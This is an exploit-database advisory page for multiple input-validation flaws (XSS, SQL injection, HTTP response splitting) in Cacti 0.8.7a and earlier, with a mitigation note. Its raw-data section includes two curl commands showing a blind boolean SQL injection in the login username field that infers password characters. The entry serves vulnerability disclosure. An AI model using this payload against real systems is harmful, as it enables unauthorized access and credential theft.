header-logo
Suggest Exploit
vendor:
Cacti
by:
SecurityFocus
7.5
CVSS
HIGH
Multiple Cross-Site Scripting, Multiple SQL-Injection, HTTP Response-Splitting
79, 89, 113
CWE
Product Name: Cacti
Affected Version From: Cacti 0.8.7a and prior versions
Affected Version To: Cacti 0.8.7a and prior versions
Patch Exists: YES
Related CWE: N/A
CPE: a:cacti:cacti
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Cacti Multiple Unspecified Input-Validation Vulnerabilities

Cacti is prone to multiple unspecified input-validation vulnerabilities, including multiple cross-site scripting vulnerabilities, multiple SQL-injection vulnerabilities, and an HTTP response-splitting vulnerability. Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to compromise the application, access or modify data, or execute arbitrary script code in the browser of an unsuspecting user.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27749/info
     
Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
     
- Multiple cross-site scripting vulnerabilities
- Multiple SQL-injection vulnerabilities
- An HTTP response-splitting vulnerability.
     
Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
     
These issues affect Cacti 0.8.7a and prior versions. 

$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))>56#&action=login" \
| head -n1
HTTP/1.1 200 OK
$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))<56#&action=login" \
| head -n1
HTTP/1.1 302 Found

Navigation

Suggest Exploit

Services By CQR